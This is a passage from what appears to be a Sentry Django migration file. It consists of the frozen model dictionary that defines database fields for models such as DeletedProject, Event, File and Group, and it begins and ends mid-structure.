'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sentry.deletedorganization': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedOrganization', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedproject': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedProject', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deletedteam': {
'Meta': {'unique_together': '()', 'object_name': 'DeletedTeam', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'actor_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'actor_label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_deleted': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'organization_name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'organization_slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'reason': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'sentry.deploy': {
'Meta': {'unique_together': '()', 'object_name': 'Deploy', 'index_together': '()'},
'date_finished': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'notified': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'db_index': 'True', 'blank': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'sentry.discoversavedquery': {
'Meta': {'unique_together': '()', 'object_name': 'DiscoverSavedQuery', 'index_together': '()'},
'created_by': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.DiscoverSavedQueryProject']", 'symmetrical': 'False'}),
'query': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'})
},
'sentry.discoversavedqueryproject': {
'Meta': {'unique_together': "(('project', 'discover_saved_query'),)", 'object_name': 'DiscoverSavedQueryProject', 'index_together': '()'},
'discover_saved_query': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.DiscoverSavedQuery']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.distribution': {
'Meta': {'unique_together': "(('release', 'name'),)", 'object_name': 'Distribution', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"})
},
'sentry.email': {
'Meta': {'unique_together': '()', 'object_name': 'Email', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('sentry.db.models.fields.citext.CIEmailField', [], {'unique': 'True', 'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.environment': {
'Meta': {'unique_together': "(('organization_id', 'name'),)", 'object_name': 'Environment', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Project']", 'through': "orm['sentry.EnvironmentProject']", 'symmetrical': 'False'})
},
'sentry.environmentproject': {
'Meta': {'unique_together': "(('project', 'environment'),)", 'object_name': 'EnvironmentProject', 'index_together': '()'},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_hidden': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.event': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'", 'index_together': "(('group_id', 'datetime'),)"},
'data': ('sentry.db.models.fields.node.NodeField', [], {'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'db_column': "'message_id'"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'time_spent': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'null': 'True'})
},
'sentry.eventattachment': {
'Meta': {'unique_together': "(('project_id', 'event_id', 'file'),)", 'object_name': 'EventAttachment', 'index_together': "(('project_id', 'date_added'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.TextField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventmapping': {
'Meta': {'unique_together': "(('project_id', 'event_id'),)", 'object_name': 'EventMapping', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventprocessingissue': {
'Meta': {'unique_together': "(('raw_event', 'processing_issue'),)", 'object_name': 'EventProcessingIssue', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'processing_issue': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProcessingIssue']"}),
'raw_event': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.RawEvent']"})
},
'sentry.eventtag': {
'Meta': {'unique_together': "(('event_id', 'key_id', 'value_id'),)", 'object_name': 'EventTag', 'index_together': "(('group_id', 'key_id', 'value_id'),)"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'event_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'value_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventuser': {
'Meta': {'unique_together': "(('project_id', 'ident'), ('project_id', 'hash'))", 'object_name': 'EventUser', 'index_together': "(('project_id', 'email'), ('project_id', 'username'), ('project_id', 'ip_address'))"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'})
},
'sentry.externalissue': {
'Meta': {'unique_together': "(('organization_id', 'integration_id', 'key'),)", 'object_name': 'ExternalIssue', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'metadata': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.featureadoption': {
'Meta': {'unique_together': "(('organization', 'feature_id'),)", 'object_name': 'FeatureAdoption', 'index_together': '()'},
'applicable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'complete': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'feature_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.file': {
'Meta': {'unique_together': '()', 'object_name': 'File', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'legacy_blob'", 'null': 'True', 'to': "orm['sentry.FileBlob']"}),
'blobs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.FileBlob']", 'through': "orm['sentry.FileBlobIndex']", 'symmetrical': 'False'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'null': 'True', 'db_index': 'True'}),
'headers': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.TextField', [], {}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.fileblob': {
'Meta': {'unique_together': '()', 'object_name': 'FileBlob', 'index_together': '()'},
'checksum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'size': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'})
},
'sentry.fileblobindex': {
'Meta': {'unique_together': "(('file', 'blob', 'offset'),)", 'object_name': 'FileBlobIndex', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'offset': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.fileblobowner': {
'Meta': {'unique_together': "(('blob', 'organization'),)", 'object_name': 'FileBlobOwner', 'index_together': '()'},
'blob': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.FileBlob']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"})
},
'sentry.group': {
'Meta': {'unique_together': "(('project', 'short_id'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'", 'index_together': "(('project', 'first_release'),)"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'short_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'unique_together': '()', 'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'", 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'assignee_set'", 'to': "orm['sentry.Project']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.Team']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_assignee_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupcommitresolution': {
'Meta': {'unique_together': "(('group_id', 'commit_id'),)", 'object_name': 'GroupCommitResolution', 'index_together': '()'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.groupemailthread': {
'Meta': {'unique_together': "(('email', 'group'), ('email', 'msgid'))", 'object_name': 'GroupEmailThread', 'index_together': '()'},
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'groupemail_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'msgid': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'groupemail_set'", 'to': "orm['sentry.Project']"})
},
'sentry.groupenvironment': {
'Meta': {'unique_together': "(('group', 'environment'),)", 'object_name': 'GroupEnvironment', 'index_together': "(('environment', 'first_release'),)"},
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']"}),
'first_release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']", 'null': 'True', 'on_delete': 'models.DO_NOTHING'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'group_tombstone_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'state': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouplink': {
'Meta': {'unique_together': "(('group_id', 'linked_type', 'linked_id'),)", 'object_name': 'GroupLink', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'linked_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'linked_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'relationship': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '2'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.groupredirect': {
'Meta': {'unique_together': '()', 'object_name': 'GroupRedirect', 'index_together': '()'},
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'unique': 'True'})
},
'sentry.grouprelease': {
'Meta': {'unique_together': "(('group_id', 'release_id', 'environment'),)", 'object_name': 'GroupRelease', 'index_together': '()'},
'environment': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '64'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'})
},
'sentry.groupresolution': {
'Meta': {'unique_together': '()', 'object_name': 'GroupResolution', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Release']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.groupshare': {
'Meta': {'unique_together': '()', 'object_name': 'GroupShare', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
